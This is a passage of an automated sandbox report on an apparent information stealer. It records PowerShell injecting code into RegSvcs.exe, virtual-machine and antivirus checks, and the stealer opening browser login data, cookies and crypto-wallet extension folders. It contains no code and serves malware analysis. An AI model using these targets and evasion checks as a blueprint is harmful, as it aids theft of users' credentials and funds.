Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1915035763.00000219C78C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0043904E push ss; ret 3_2_0043904F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B0DE pushad ; retf 3_2_0044B0E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B0DA pushad ; retf 3_2_0044B0DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B0EE push 0800D5C3h; retf 3_2_0044B0FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B142 pushad ; retf 3_2_0044B145
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B542 pushad ; retf 3_2_0044B545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044B532 pushad ; retf 3_2_0044B541
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0044F6D9 pushad ; iretd 3_2_0044F6B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041F77B push es; retf 3_2_0041F781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00444F80 push eax; mov dword ptr [esp], F0F3F285h 3_2_00444F81
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4125
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5733
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep time: -14757395258967632s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: PhysicalDrive0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWu
      Source: Amcache.hve.0.dr Binary or memory string: VMware
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin
      Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: RegSvcs.exe, 00000003.00000002.1520232488.00000000011CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh^!
      Source: Amcache.hve.0.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: vmci.sys
      Source: Amcache.hve.0.dr Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.dr Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.dr Binary or memory string: VMware20,1
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.dr Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
      Source: Amcache.hve.0.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00443AB0 LdrInitializeThunk,3_2_00443AB0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 448000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 44B000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F00008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.dr Binary or memory string: MsMpEng.exe
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Windows Defender\MsMpeng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara match File source: sslproxydump.pcap, type: PCAP
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
      Source: RegSvcs.exe, 00000003.00000002.1520290770.00000000011F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3m
      Source: RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
      Source: powershell.exe, 00000000.00000002.1918060411.00007FFAAC650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflad
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
